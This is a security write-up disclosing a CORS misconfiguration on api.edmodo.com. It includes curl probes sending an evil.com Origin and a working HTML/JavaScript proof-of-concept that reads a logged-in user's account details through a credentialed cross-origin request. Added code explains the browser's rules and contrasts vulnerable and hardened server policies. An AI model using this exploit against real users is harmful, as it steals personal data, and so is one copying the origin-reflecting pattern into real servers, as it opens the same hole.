Exploitation of a CORS (Cross-Origin Resource Sharing) misconfiguration on Edmodo
Hello All,
This is Yeasir Arafat. While testing Edmodo I found an API endpoint that was vulnerable to a CORS misconfiguration. The first step is to confirm whether the host is actually exploitable, and for that you need curl installed on your PC.
Here is the curl command (the -i flag prints the response headers, which is where the Access-Control-* headers show up):
curl -i https://www.edmodo.com -H "Origin: https://evil.com"
Response:
200 OK, but with no Access-Control-Allow-Credentials: true header.
On its own that is not enough to steal a logged-in user's data: without Access-Control-Allow-Credentials: true the browser refuses to expose a credentialed (cookie-carrying) response to evil.com, so www.edmodo.com is not exploitable this way.
Now the same check against api.edmodo.com:
curl -i https://api.edmodo.com -H "Origin: https://evil.com"
Response:
200 OK.
And this time the response carries Access-Control-Allow-Credentials: true (together with an Access-Control-Allow-Origin that reflects the attacker's origin, which is what the exploit below relies on).
That means api.edmodo.com is vulnerable: a page on any origin can make a logged-in user's browser attach their Edmodo cookies to a request and then read the response. See the image below.
From that API endpoint I obtained sensitive information: IP address, email, user id, account creation date, the "about" field, and more.
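To make the difference between the two curl results above precise, here is an added example (my own code, not from Yeasir's write-up) that replays the browser's CORS decision for a cross-origin read. The header sets are constructed: the www.edmodo.com sample assumes the origin was reflected but no credentials header was sent, and the api.edmodo.com sample has both; the wildcard and no-header cases are added for contrast and are not claims about Edmodo.

```javascript
// Added example (not from the original post): classify what a page at
// `requestOrigin` can read from a response that carries `headers`,
// following the rules a browser applies to CORS responses:
//   - Access-Control-Allow-Origin must equal the request origin, or be "*".
//   - A request sent with cookies (withCredentials) is only readable when
//     Access-Control-Allow-Credentials is exactly "true" AND the allowed
//     origin is not "*" (browsers reject the wildcard for credentialed reads).
// Returns one of:
//   "blocked"              - nothing cross-origin can read it
//   "unauthenticated-only" - readable, but not with the victim's cookies
//   "authenticated"        - readable WITH the victim's cookies: exploitable
function classifyCors(requestOrigin, headers) {
  // Header names are case-insensitive, so normalise once.
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value).trim();
  }
  const acao = h['access-control-allow-origin'];
  const acac = h['access-control-allow-credentials'];

  if (acao === undefined) return 'blocked';
  if (acao === '*') return 'unauthenticated-only'; // wildcard never pairs with cookies
  if (acao !== requestOrigin) return 'blocked';    // some other origin is allowed
  // Our origin is reflected/allowed; cookies only count with the literal "true".
  return acac === 'true' ? 'authenticated' : 'unauthenticated-only';
}

// Constructed responses modelled on the two curl checks in the write-up
// (the reflected Origin on www is an assumption; the post shows only the
// status and the missing credentials header). The last two are hypothetical.
const SAMPLE_RESPONSES = {
  'www.edmodo.com': {
    'Access-Control-Allow-Origin': 'https://evil.com',
  },
  'api.edmodo.com': {
    'Access-Control-Allow-Origin': 'https://evil.com',
    'Access-Control-Allow-Credentials': 'true',
  },
  'hypothetical-wildcard-host': {
    'Access-Control-Allow-Origin': '*',
    'Access-Control-Allow-Credentials': 'true', // ignored by browsers with "*"
  },
  'hypothetical-no-cors-host': {},
};

// Run the attacker's origin against every sample and report the verdicts.
function triage(attackerOrigin = 'https://evil.com') {
  const verdicts = {};
  for (const [host, headers] of Object.entries(SAMPLE_RESPONSES)) {
    verdicts[host] = classifyCors(attackerOrigin, headers);
  }
  return verdicts;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triage());
}
```

Only the "authenticated" verdict is the bug this write-up is about; "unauthenticated-only" means the endpoint is readable cross-origin but the victim's session is not involved, which is usually harmless for a public resource.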
Endpoint:
For exploitation I used the code below:
<!DOCTYPE html>
<html>
<head>
<title>CORS PoC Exploit</title>
</head>
<body>
<center><h1>CORS Exploit<br>Yeasir Arafat</h1>
<hr>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script type="text/javascript">
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    // readyState 4 = request finished. The response body is readable here
    // only because api.edmodo.com reflects our Origin and allows credentials.
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  // Cross-origin GET to the vulnerable API endpoint.
  xhttp.open("GET", "https://api.edmodo.com/users/id", true);
  // Make the browser attach the victim's Edmodo cookies to the request.
  xhttp.withCredentials = true;
  xhttp.send();
}
</script></center>
</body>
</html>
I ran this exploit page in my browser. It works just as well hosted on localhost, on any free domain, or anywhere else, because api.edmodo.com accepts whatever Origin is sent; to demonstrate it I simply opened it in my browser.
If a logged-in Edmodo user opens this page and clicks the Exploit button, their account information is returned to the attacker's page. Note that this PoC only renders the response inside the page; a real attack would forward responseText to an attacker-controlled server, and nothing requires the button, since the request could just as well be fired when the page loads.
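The server-side pattern behind this kind of bug, next to a hardened version, as an added example that is my own illustration and not Edmodo's code. The functions compute the CORS response headers for a given Origin request header (the shape you would use inside a Node http handler); the allow-listed first-party origins are assumptions, not values taken from the write-up.

```javascript
// Added example, not Edmodo's code: three ways a server can answer the
// Origin header, from the misconfiguration in this write-up to a safe one.

// 1. The misconfiguration: whatever Origin arrives is echoed back together
//    with Allow-Credentials, so ANY site can make the victim's browser attach
//    its cookies and read the JSON. This is what the PoC above exploits.
function vulnerableCorsHeaders(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// 2. A common half-fix: "does the origin end with our domain?". Without the
//    leading dot and scheme check this is a plain suffix match, so an
//    attacker just registers evil-edmodo.com and is reflected like before.
function suffixMatchCorsHeaders(origin) {
  if (!origin || !origin.endsWith('edmodo.com')) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// 3. Hardened: exact, case-sensitive match against a fixed allow-list of
//    full origins (scheme + host). Unknown origins, a missing Origin and the
//    literal "null" origin (sandboxed iframes, file://) get no CORS headers,
//    so the browser blocks the read. "Vary: Origin" is always sent so a
//    shared cache never serves one origin's response to another.
const ALLOWED_ORIGINS = new Set([
  'https://www.edmodo.com', // assumed first-party origins (not from the post)
  'https://app.edmodo.com',
]);

function hardenedCorsHeaders(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return { Vary: 'Origin' };
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}

// Would a page at `origin` be able to read the response with the victim's
// cookies? (Origin reflected/allowed AND credentials explicitly permitted.)
function leaksToOrigin(buildHeaders, origin) {
  const h = buildHeaders(origin);
  return h['Access-Control-Allow-Origin'] === origin &&
         h['Access-Control-Allow-Credentials'] === 'true';
}

// Compare all three policies against a set of probe origins: the attacker
// origin from the write-up, two look-alike domains, a first-party origin and
// the "null" origin. Returns { policyName: { origin: leaks? } }.
function comparePolicies() {
  const probes = [
    'https://evil.com',
    'https://evil-edmodo.com',
    'https://www.edmodo.com.evil.com',
    'https://www.edmodo.com',
    'null',
  ];
  const policies = { vulnerableCorsHeaders, suffixMatchCorsHeaders, hardenedCorsHeaders };
  const report = {};
  for (const [name, fn] of Object.entries(policies)) {
    report[name] = {};
    for (const origin of probes) report[name][origin] = leaksToOrigin(fn, origin);
  }
  return report;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(comparePolicies());
}
```

The rule of thumb the hardened version follows: if you need Access-Control-Allow-Credentials: true at all, the allowed origin must come from a fixed list compared as a whole string, never from a regex, substring or suffix test on the incoming Origin.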